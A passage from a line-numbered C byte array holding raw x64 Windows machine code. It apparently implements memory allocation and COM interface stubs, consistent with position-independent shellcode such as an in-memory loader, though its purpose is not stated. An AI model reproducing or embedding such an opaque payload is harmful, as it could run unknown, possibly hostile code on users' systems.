1567 0x85, 0xec, 0x00, 0x00, 0x00, 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8b,
1568 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8d, 0x55,
1569 0xa0, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89,
1570 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x01, 0x00, 0x00, 0xe8, 0x2d, 0xc3, 0xff,
1571 0xff, 0x48, 0x89, 0x45, 0x50, 0x48, 0x83, 0x7d, 0x50, 0x00, 0x0f, 0x84,
1572 0xe6, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xb0, 0x00, 0x00, 0x00, 0x00, 0x74,
1573 0x6b, 0x48, 0x8b, 0x45, 0x50, 0x48, 0x89, 0x85, 0xc8, 0x00, 0x00, 0x00,
1574 0x83, 0xbd, 0xb4, 0x00, 0x00, 0x00, 0x00, 0x74, 0x15, 0x48, 0x8b, 0x45,
1575 0x50, 0x48, 0x89, 0x45, 0x40, 0x48, 0x8b, 0x45, 0x40, 0xff, 0xd0, 0x48,
1576 0x89, 0x85, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xc8, 0x00, 0x00,
1577 0x00, 0x00, 0x0f, 0x84, 0x9f, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xc8,
1578 0x00, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
1579 0x00, 0x01, 0x00, 0x00, 0xe8, 0xd7, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x0f,
1580 0x84, 0x7e, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x55, 0x28, 0x48, 0x8b, 0x85,
1581 0xc8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0xe9, 0x6b, 0xfe, 0xff, 0xff,
1582 0x48, 0x8b, 0x45, 0x50, 0x48, 0x89, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x83,
1583 0xbd, 0xb4, 0x00, 0x00, 0x00, 0x00, 0x74, 0x15, 0x48, 0x8b, 0x45, 0x50,
1584 0x48, 0x89, 0x45, 0x48, 0x48, 0x8b, 0x45, 0x48, 0xff, 0xd0, 0x48, 0x89,
1585 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xc0, 0x00, 0x00, 0x00,
1586 0x00, 0x0f, 0x84, 0x34, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xc0, 0x00,
1587 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00,
1588 0x01, 0x00, 0x00, 0xe8, 0x6c, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84,
1589 0x13, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48,
1590 0x8b, 0x50, 0x08, 0x48, 0x8b, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x89,
1591 0x10, 0xe9, 0xf9, 0xfd, 0xff, 0xff, 0x90, 0xe9, 0xf3, 0xfd, 0xff, 0xff,
1592 0x90, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
1593 0x89, 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00,
1594 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x0f, 0x85, 0xb9, 0xfd,
1595 0xff, 0xff, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x70, 0x01,
1596 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x80, 0x04, 0x00, 0x00,
1597 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0x10,
1598 0x04, 0x00, 0x00, 0x48, 0x89, 0x95, 0x18, 0x04, 0x00, 0x00, 0x48, 0x8b,
1599 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00,
1600 0x48, 0x89, 0x85, 0xf8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x04,
1601 0x00, 0x00, 0x48, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00, 0x48, 0x83, 0xc0,
1602 0x01, 0x48, 0x01, 0xc0, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8d, 0x4d, 0xd8,
1603 0x48, 0x8d, 0x85, 0xe8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xf8, 0x03,
1604 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x28, 0x04,
1605 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x30, 0x00, 0x00, 0x49,
1606 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48,
1607 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xc8, 0x21, 0x00, 0x00, 0x89,
1608 0x85, 0xf4, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf4, 0x03, 0x00, 0x00, 0x00,
1609 0x0f, 0x88, 0xe4, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00,
1610 0x00, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x8b, 0x95, 0x18, 0x04, 0x00, 0x00,
1611 0x8b, 0x92, 0x24, 0x05, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89, 0xd0, 0x48,
1612 0x8b, 0x95, 0xe8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x18, 0x04, 0x00,
1613 0x00, 0x48, 0x81, 0xc1, 0x28, 0x05, 0x00, 0x00, 0x44, 0x89, 0x44, 0x24,
1614 0x28, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0xff, 0xff, 0xff, 0xff,
1615 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00,
1616 0x00, 0xff, 0xd0, 0x48, 0x8d, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x89,
1617 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x70, 0x03, 0x00, 0x00,
1618 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x04, 0x00, 0x00, 0xe8, 0x79,
1619 0x03, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xe0, 0x02, 0x00, 0x00, 0x48, 0x89,
1620 0x85, 0x80, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x70, 0x03, 0x00, 0x00,
1621 0x48, 0x83, 0xc0, 0x10, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x04,
1622 0x00, 0x00, 0xe8, 0x8c, 0x07, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xf0, 0x01,
1623 0x00, 0x00, 0x48, 0x89, 0x85, 0x98, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x85,
1624 0x70, 0x03, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x28, 0x48, 0x89, 0xc2, 0x48,
1625 0x8b, 0x8d, 0x10, 0x04, 0x00, 0x00, 0xe8, 0x10, 0x09, 0x00, 0x00, 0x48,
1626 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x80, 0x01, 0x00,
1627 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff,
1628 0xd0, 0x89, 0x85, 0xf0, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf0, 0x03, 0x00,
1629 0x00, 0x00, 0x0f, 0x85, 0x89, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10,
1630 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b,
1631 0x95, 0x10, 0x04, 0x00, 0x00, 0x4c, 0x8d, 0x82, 0xa4, 0x08, 0x00, 0x00,
1632 0x48, 0x8b, 0x95, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x84, 0x08,
1633 0x00, 0x00, 0x48, 0x8d, 0x95, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x89, 0x54,
1634 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x03, 0x00, 0x00, 0x00, 0xba,
1635 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xf0, 0x03, 0x00, 0x00,
1636 0x83, 0xbd, 0xf0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x30, 0x02, 0x00,
1637 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c,
1638 0x8b, 0x08, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x90,
1639 0xe4, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48,
1640 0x8d, 0x8d, 0xe0, 0x03, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1,
1641 0x41, 0xff, 0xd1, 0x89, 0x85, 0xf0, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf0,
1642 0x03, 0x00, 0x00, 0x00, 0x0f, 0x85, 0xb7, 0x01, 0x00, 0x00, 0x48, 0x8b,
1643 0x85, 0xe0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x18,
1644 0x48, 0x8b, 0x85, 0xe0, 0x03, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2,
1645 0x89, 0x85, 0xf0, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf0, 0x03, 0x00, 0x00,
1646 0x00, 0x0f, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x03,
1647 0x00, 0x00, 0x48, 0x89, 0x85, 0xb0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85,
1648 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x40, 0x18, 0x48,
1649 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x70, 0x03, 0x00,
1650 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x85, 0xf0, 0x03, 0x00,
1651 0x00, 0x83, 0xbd, 0xf0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x2d, 0x01,
1652 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x05, 0xe5,
1653 0x05, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x49, 0x89, 0xd0, 0x48, 0x89,
1654 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x04, 0x00, 0x00, 0xe8, 0xf0, 0xbd, 0xff,
1655 0xff, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08,
1656 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xe0, 0x48, 0x89, 0xc1, 0xff, 0xd2,
1657 0x48, 0x89, 0x85, 0xe8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x03,
1658 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x48, 0x40, 0x48, 0x8b, 0x85,
1659 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x03, 0x00, 0x00, 0x41,
1660 0xb8, 0x02, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1, 0x89,
1661 0x85, 0xf0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00,
1662 0x48, 0x8b, 0x90, 0x10, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x03,
1663 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x83, 0xbd, 0xf0, 0x03, 0x00,
1664 0x00, 0x00, 0x0f, 0x85, 0x97, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
1665 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x28, 0x48, 0x8b,
1666 0x95, 0xe8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x03, 0x00, 0x00,
1667 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44,
1668 0x24, 0x40, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00,
1669 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7,
1670 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20,
1671 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8,
1672 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85,
1673 0xf0, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf0, 0x03, 0x00, 0x00, 0x00, 0x75,
1674 0x26, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c,
1675 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0xba, 0x02,
1676 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x85, 0xf0,
1677 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x03, 0x00, 0x00, 0x48, 0x8b,
1678 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x85, 0xe0, 0x03, 0x00, 0x00,
1679 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00,
1680 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x38, 0x48, 0x8b, 0x85, 0xd8, 0x03,
1681 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85, 0xd8, 0x03,
1682 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x85,
1683 0xd8, 0x03, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85,
1684 0x10, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00, 0x48,
1685 0x83, 0xc0, 0x01, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x01, 0x00,
1686 0x00, 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1,
1687 0xe8, 0xb3, 0x15, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd8, 0x00, 0x00, 0x00,
1688 0x00, 0x48, 0x8d, 0x4d, 0xd8, 0x48, 0x8d, 0x85, 0xe8, 0x01, 0x00, 0x00,
1689 0x48, 0x8b, 0x95, 0xf8, 0x03, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20,
1690 0x41, 0xb9, 0x00, 0x80, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2,
1691 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x03, 0x1e, 0x00, 0x00,
1692 0x89, 0x85, 0xf4, 0x03, 0x00, 0x00, 0x90, 0x48, 0x81, 0xc4, 0x80, 0x04,
1693 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10,
1694 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18,
1695 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
1696 0x8d, 0x15, 0xd5, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x8b, 0x45,
1697 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xb7, 0x01, 0x00, 0x00, 0x48,
1698 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1699 0x15, 0xdf, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48, 0x8b, 0x45,
1700 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x4f, 0x03, 0x00, 0x00, 0x48,
1701 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1702 0x15, 0xfc, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48, 0x8b, 0x45,
1703 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x62, 0x03, 0x00, 0x00, 0x48,
1704 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1705 0x15, 0x63, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b, 0x45,
1706 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x68, 0x03, 0x00, 0x00, 0x48,
1707 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1708 0x15, 0x62, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48, 0x8b, 0x45,
1709 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x56, 0x03, 0x00, 0x00, 0x48,
1710 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1711 0x15, 0x53, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48, 0x8b, 0x45,
1712 0xf8, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8,
1713 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x58, 0x90, 0x48, 0x83, 0xc4,
1714 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48,
1715 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48,
1716 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0x20, 0x00,
1717 0x75, 0x0a, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xe9, 0xc0, 0x00, 0x00, 0x00,
1718 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x58, 0x48, 0x8d, 0x88, 0x04,
1719 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00,
1720 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xbb, 0x14, 0x00, 0x00, 0x85, 0xc0, 0x74,
1721 0x25, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x58, 0x48, 0x8d, 0x88,
1722 0xb4, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00,
1723 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x96, 0x14, 0x00, 0x00, 0x85, 0xc0,
1724 0x75, 0x1b, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89,
1725 0x10, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x68, 0x00, 0x00, 0x00, 0xb8, 0x00,
1726 0x00, 0x00, 0x00, 0xeb, 0x5b, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40,
1727 0x58, 0x48, 0x8d, 0x88, 0xc4, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
1728 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x56, 0x14,
1729 0x00, 0x00, 0x85, 0xc0, 0x75, 0x26, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8d,
1730 0x50, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x89, 0x10, 0x48, 0x8b, 0x45,
1731 0xf8, 0x48, 0x83, 0xc0, 0x10, 0x48, 0x89, 0xc1, 0xe8, 0x86, 0x03, 0x00,
1732 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20,
1733 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80,
1734 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
1735 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89,
1736 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89,
1737 0x45, 0xf0, 0x48, 0x8b, 0x45, 0xf0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0,
1738 0x0f, 0xc1, 0x10, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x40, 0x08, 0x48, 0x83,
1739 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20,
1740 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8,
1741 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xe8,
1742 0x48, 0x8b, 0x55, 0xe8, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89,
1743 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xf4,
1744 0x8b, 0x45, 0xf4, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1745 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1746 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45,
1747 0x10, 0x48, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0x20, 0x83, 0xe0, 0x02, 0x85,
1748 0xc0, 0x74, 0x39, 0x48, 0x83, 0x7d, 0x30, 0x00, 0x75, 0x07, 0xb8, 0x03,
1749 0x40, 0x00, 0x80, 0xeb, 0x70, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40,
1750 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x08, 0x48, 0x8b, 0x45, 0xf8,
1751 0x48, 0x8b, 0x40, 0x38, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x45,
1752 0xf8, 0x48, 0x8b, 0x50, 0x38, 0x48, 0x8b, 0x45, 0x30, 0x48, 0x89, 0x10,
1753 0x8b, 0x45, 0x20, 0x83, 0xe0, 0x01, 0x85, 0xc0, 0x74, 0x36, 0x48, 0x83,
1754 0x7d, 0x28, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x2d,
1755 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x40, 0x08,
1756 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x83, 0xc2, 0x28, 0x48, 0x89, 0xd1, 0xff,
1757 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8d, 0x50, 0x28, 0x48, 0x8b, 0x45,
1758 0x28, 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4,
1759 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xc4, 0x80, 0x48,
1760 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xc7, 0x45, 0xac, 0x00, 0x00,
1761 0x00, 0x00, 0xc7, 0x45, 0xa8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa4,
1762 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xb0, 0x41, 0xb8, 0x40, 0x00,
1763 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x19,
1764 0x12, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x4c, 0x8b,
1765 0x40, 0x18, 0x48, 0x8d, 0x55, 0xb0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89,
1766 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d, 0xfc, 0x00, 0x75,
1767 0x2a, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x20,
1768 0x4c, 0x8d, 0x45, 0xa4, 0x48, 0x8d, 0x4d, 0xa8, 0x48, 0x8d, 0x55, 0xac,
1769 0x48, 0x8b, 0x45, 0x18, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89,
1770 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0xb8, 0x00, 0x00, 0x00, 0x00,
1771 0x48, 0x83, 0xec, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
1772 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b,
1773 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b,
1774 0x40, 0x58, 0x48, 0x8b, 0x40, 0x68, 0xff, 0xd0, 0x48, 0x8b, 0x55, 0x18,
1775 0x89, 0x02, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d,
1776 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1777 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1778 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20,
1779 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1780 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d,
1781 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00,
1782 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1783 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1784 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48,
1785 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x65, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10,
1786 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xf1, 0x00,
1787 0x00, 0x00, 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
1788 0x00, 0x48, 0x8d, 0x15, 0x11, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10,
1789 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x38, 0x01,
1790 0x00, 0x00, 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
1791 0x00, 0x48, 0x8d, 0x15, 0x39, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20,
1792 0x48, 0x8b, 0x45, 0x18, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48,
